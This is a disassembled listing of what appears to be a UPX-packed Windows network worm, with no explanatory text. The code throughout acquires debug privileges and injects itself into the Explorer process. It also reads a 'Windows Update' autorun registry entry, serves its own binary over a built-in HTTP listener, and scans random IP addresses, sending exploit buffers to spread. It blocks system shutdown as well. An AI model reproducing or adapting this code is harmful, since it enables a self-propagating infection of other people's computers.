cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp eax, 46h
jl loc_30901D04
cmp [ebp+var_730], 31h
jnz loc_30901BAF
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902C36 ; memset
add esp, 0Ch
push offset byte_309042F0
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902C42 ; memcpy
mov eax, dword_30904BF6
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A50: ; CODE XREF: sub_309017B9+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 68h
push offset dword_30904834
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A0h
push offset dword_309048A0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp [ebp+arg_0], 0
jz loc_30901C9F
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A58
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902C42 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904AC4
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902C42 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B38
push eax
call sub_30902C42 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901CF7
; ---------------------------------------------------------------------------
loc_30901BAF: ; CODE XREF: sub_309017B9+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902C36 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904C30
push eax
call sub_30902C42 ; memcpy
push offset byte_309042F0
call sub_30902C3C ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904CA8
push eax
call sub_30902C42 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904C30
push eax
call sub_30902C42 ; memcpy
add esp, 40h
push offset byte_309042F0
call sub_30902C3C ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C4B: ; CODE XREF: sub_309017B9+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C4B
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902C36 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902C36 ; memset
add esp, 18h
jmp loc_30901A50
; ---------------------------------------------------------------------------
loc_30901C9F: ; CODE XREF: sub_309017B9+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_30904944
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902C42 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_309049C4
push eax
call sub_30902C42 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901CF7: ; CODE XREF: sub_309017B9+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_30901D04: ; CODE XREF: sub_309017B9+1AD�j
; sub_309017B9+1E1�j ...
push 2
push [ebp+var_4]
call dword_3090116C ; shutdown
loc_30901D0F: ; CODE XREF: sub_309017B9+166�j
push [ebp+var_4]
call dword_30901170 ; closesocket
pop esi
loc_30901D19: ; CODE XREF: sub_309017B9+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D20 proc near ; CODE XREF: UPX0:loc_30902321�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A4 ; LoadLibraryA
mov esi, dword_309010A0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DA4
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DA4
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_30901DA4
lea eax, [ebp+var_C]
push eax
push 20h
call dword_3090109C ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DA4: ; CODE XREF: sub_30901D20+28�j
; sub_30901D20+37�j ...
pop edi
pop esi
leave
retn
sub_30901D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DA8 proc near ; CODE XREF: UPX0:30902335�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30904FE0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B0 ; GetModuleHandleA
mov esi, dword_309010A0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901DEF
loc_30901DEB: ; CODE XREF: sub_30901DA8+54�j
push 1
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901DEF: ; CODE XREF: sub_30901DA8+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901DEB
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_3090110C ; FindWindowA
test eax, eax
jnz short loc_30901E1D
call dword_30901110 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E1D
push 2
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901E1D: ; CODE XREF: sub_30901DA8+65�j
; sub_30901DA8+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901114 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010AC ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E43
push 3
loc_30901E40: ; CODE XREF: sub_30901DA8+45�j
; sub_30901DA8+73�j
pop eax
jmp short loc_30901EAE
; ---------------------------------------------------------------------------
loc_30901E43: ; CODE XREF: sub_30901DA8+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EA1
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010A8 ; WriteProcessMemory
push dword_30904FD4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901E8D
push eax
call esi ; CloseHandle
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901E8D: ; CODE XREF: sub_30901DA8+DE�j
push offset aUterm15 ; "uterm15"
call sub_30901EE1
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901EA1: ; CODE XREF: sub_30901DA8+B2�j
mov [ebp+var_4], 4
loc_30901EA8: ; CODE XREF: sub_30901DA8+E3�j
; sub_30901DA8+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_30901EAE: ; CODE XREF: sub_30901DA8+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EB3 proc near ; CODE XREF: sub_3090216F+B�p
; UPX0:309022F7�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010E8 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901EB3 endp
; =============== S U B R O U T I N E =======================================
sub_30901EE1 proc near ; CODE XREF: sub_30901DA8+EA�p
; UPX0:30902301�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010B8 ; CreateMutexA
retn
sub_30901EE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EF0 proc near ; CODE XREF: sub_3090235D+113�p
; sub_3090235D+11E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
pop ebp
retn
sub_30901EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F0A proc near ; CODE XREF: sub_3090216F+12C�p
; sub_3090252C+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F0A endp
; =============== S U B R O U T I N E =======================================
sub_30901F2B proc near ; CODE XREF: sub_309011A0+68�p
; sub_309029FD+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F53
loc_30901F3C: ; CODE XREF: sub_30901F2B+26�j
call dword_309010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F3C
loc_30901F53: ; CODE XREF: sub_30901F2B+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F5B proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902C36 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C0 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FB1 proc near ; CODE XREF: sub_309025B4+3E�p
; sub_3090267B+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_30901148 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FD2
call dword_3090114C ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FD2: ; CODE XREF: sub_30901FB1+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901150 ; gethostbyname
test eax, eax
jnz short loc_30901FE7
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30901FE7: ; CODE XREF: sub_30901FB1+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FB1 endp
; =============== S U B R O U T I N E =======================================
sub_30901FF0 proc near ; CODE XREF: sub_309024C8+22�p
; sub_3090252C+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3090112C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30901FF0 endp
; =============== S U B R O U T I N E =======================================
sub_30902006 proc near ; CODE XREF: sub_3090235D+40�p
; sub_3090235D+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010C8 ; OpenEventA
test eax, eax
jz short locret_3090201F
push eax
call dword_309010C4 ; SetEvent
locret_3090201F: ; CODE XREF: sub_30902006+10�j
retn
sub_30902006 endp
; =============== S U B R O U T I N E =======================================
sub_30902020 proc near ; CODE XREF: sub_3090169C+29�p
push esi
mov esi, dword_309010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_30902020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902036 proc near ; DATA XREF: sub_3090216F+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902067
push 1
jmp loc_30902122
; ---------------------------------------------------------------------------
loc_30902067: ; CODE XREF: sub_30902036+28�j
mov esi, dword_30901100
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902125
lea eax, [ebp+var_100]
push offset dword_30904228
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902125
mov esi, dword_30901164
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_30904FD0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902C3C ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_309020E4: ; CODE XREF: sub_30902036+E8�j
mov eax, dword_30904FD0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_309020F6
mov eax, ecx
loc_309020F6: ; CODE XREF: sub_30902036+BC�j
test eax, eax
jz short loc_30902143
push 0
push eax
mov eax, dword_30904FC8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_30902120
cmp eax, 1000h
jb short loc_30902143
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020E4
; ---------------------------------------------------------------------------
loc_30902120: ; CODE XREF: sub_30902036+D5�j
push 2
loc_30902122: ; CODE XREF: sub_30902036+2C�j
pop eax
jmp short loc_30902168
; ---------------------------------------------------------------------------
loc_30902125: ; CODE XREF: sub_30902036+49�j
; sub_30902036+61�j
mov esi, dword_30901164
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_30904D70
push ebx
call esi ; send
loc_30902143: ; CODE XREF: sub_30902036+C2�j
; sub_30902036+DC�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_3090116C ; shutdown
push ebx
call dword_30901170 ; closesocket
push 0
call dword_309010CC ; ExitThread
xor eax, eax
loc_30902168: ; CODE XREF: sub_30902036+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902036 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090216F proc near ; DATA XREF: sub_3090235D+10E�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901EB3
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_30904FCC, ebx
call sub_309027EB
add esp, 14h
test eax, eax
jnz loc_309022A4
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_309021DB
push 1
call dword_309010CC ; ExitThread
loc_309021DB: ; CODE XREF: sub_3090216F+62�j
push ebx
push esi
call dword_309010D4 ; GetFileSize
push eax
mov dword_30904FD0, eax
call sub_30902C07
pop ecx
mov dword_30904FC8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30904FD0
push eax
push esi
call dword_309010D0 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30904FD0, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901154 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902C36 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3090223D: ; CODE XREF: sub_3090216F+E5�j
; sub_3090216F+ED�j ...
call dword_309010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_30904FDC, eax
jz short loc_3090223D
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3090223D
push eax
call dword_3090115C ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_3090113C ; bind
test eax, eax
jnz short loc_3090223D
push 64h
push edi
call dword_30901140 ; listen
mov [ebp+var_8], esi
pop esi
loc_30902286: ; CODE XREF: sub_3090216F+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901144 ; accept
push eax
push offset sub_30902036
call sub_30901F0A
pop ecx
pop ecx
jmp short loc_30902286
; ---------------------------------------------------------------------------
loc_309022A4: ; CODE XREF: sub_3090216F+3D�j
push ebx
call dword_309010CC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3090216F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022B3 proc near ; CODE XREF: sub_3090235D:loc_30902465�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_30901138
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_309022B3 endp
; ---------------------------------------------------------------------------
loc_309022DF: ; CODE XREF: UPX1:30906C58�j
push 0
call dword_309010B0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30904FE0, eax
call dword_309010E0 ; DeleteFileA
call sub_30901EB3
push offset aUterm15 ; "uterm15"
call sub_30901EE1
pop ecx
mov dword_30904FD4, eax
call dword_309010DC ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_30902321
push 1
call dword_309010D8 ; ExitProcess
loc_30902321: ; CODE XREF: UPX0:30902317�j
call sub_30901D20
call sub_3090294F
call sub_30902AC9
push offset sub_3090235D
call sub_30901DA8
test eax, eax
pop ecx
jz short loc_30902346
push 0
call sub_3090235D
loc_30902346: ; CODE XREF: UPX0:3090233D�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_30902349 proc near ; CODE XREF: sub_3090235D:loc_3090248E�p
; sub_309024C8:loc_309024E1�p ...
push 0
push dword_30904FD8
call dword_30901074 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_30902349 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090235D proc near ; CODE XREF: UPX0:30902341�p
; DATA XREF: UPX0:30902330�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901188
push offset loc_30902C30
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU15x ; "u15x"
xor edi, edi
push edi
push 1
push edi
call dword_30901070 ; CreateEventA
mov dword_30904FD8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU14x ; "u14x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EE1
pop ecx
cmp [ebp+arg_0], edi
jz short loc_30902465
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm15 ; "uterm15"
call sub_30901EE1
pop ecx
mov dword_30904FD4, eax
loc_30902465: ; CODE XREF: sub_3090235D+CD�j
call sub_309022B3
push edi
push offset sub_3090216F
call sub_30901EF0
push edi
push offset sub_3090169C
call sub_30901EF0
push edi
push offset loc_309026D7
call sub_30901EF0
add esp, 18h
loc_3090248E: ; CODE XREF: sub_3090235D+14C�j
call sub_30902349
test eax, eax
jnz short loc_309024AB
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_3090248E
; ---------------------------------------------------------------------------
loc_309024AB: ; CODE XREF: sub_3090235D+138�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090235D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309024C8 proc near ; DATA XREF: sub_3090252C+55�o
; sub_309025B4+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_309024D7
push 1
pop eax
jmp short locret_30902528
; ---------------------------------------------------------------------------
loc_309024D7: ; CODE XREF: sub_309024C8+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_309024E1: ; CODE XREF: sub_309024C8+5A�j
call sub_30902349
test eax, eax
jnz short loc_30902524
call sub_30901FF0
test eax, eax
jz short loc_30902524
cmp [ebp+var_1], bl
jz short loc_3090251D
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017B9
movzx esi, word_30904FEC
pop ecx
call dword_309010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_3090251D: ; CODE XREF: sub_309024C8+2E�j
inc bl
cmp bl, 0FFh
jb short loc_309024E1
loc_30902524: ; CODE XREF: sub_309024C8+20�j
; sub_309024C8+29�j
pop esi
xor eax, eax
pop ebx
locret_30902528: ; CODE XREF: sub_309024C8+D�j
leave
retn 4
sub_309024C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090252C proc near ; DATA XREF: sub_309025B4+7E�o
; UPX0:3090276C�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3090253A
push 1
pop eax
jmp short loc_309025B0
; ---------------------------------------------------------------------------
loc_3090253A: ; CODE XREF: sub_3090252C+7�j
push ebx
push esi
push edi
call sub_30901EB3
mov esi, dword_309010F8
xor ebx, ebx
loc_3090254A: ; CODE XREF: sub_3090252C+7D�j
call sub_30902349
test eax, eax
jnz short loc_309025AB
call sub_30901FF0
test eax, eax
jz short loc_309025AB
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_30904FE4
mov byte ptr [ebp+arg_0+3], al
call dword_3090106C ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_3090258D
push [ebp+arg_0]
push offset sub_309024C8
call sub_30901F0A
pop ecx
pop ecx
loc_3090258D: ; CODE XREF: sub_3090252C+50�j
movzx edi, word_30904FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_3090254A
loc_309025AB: ; CODE XREF: sub_3090252C+25�j
; sub_3090252C+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_309025B0: ; CODE XREF: sub_3090252C+C�j
pop ebp
retn 4
sub_3090252C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309025B4 proc near ; DATA XREF: UPX0:30902784�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901EB3
call sub_30902349
test eax, eax
jnz loc_3090266D
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010F8
push edi
loc_309025DA: ; CODE XREF: sub_309025B4+48�j
; sub_309025B4+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_309025E9: ; CODE XREF: sub_309025B4+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_309025E9
call sub_30901FB1
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_309025DA
call sub_30901FF0
test eax, eax
jz short loc_30902645
push offset dword_30904FE4
call dword_3090106C ; InterlockedIncrement
push edi
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_3090264C
push edi
push offset sub_309024C8
call sub_30901F0A
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_30902631: ; CODE XREF: sub_309025B4+8D�j
push edi
push offset sub_3090252C
call sub_30901F0A
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_30902631
jmp short loc_3090264C
; ---------------------------------------------------------------------------
loc_30902645: ; CODE XREF: sub_309025B4+51�j
push 2710h
call ebx ; Sleep
loc_3090264C: ; CODE XREF: sub_309025B4+67�j
; sub_309025B4+8F�j
movzx edi, word_30904FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_30902349
test eax, eax
jz loc_309025DA
pop edi
pop esi
pop ebx
loc_3090266D: ; CODE XREF: sub_309025B4+11�j
push 0
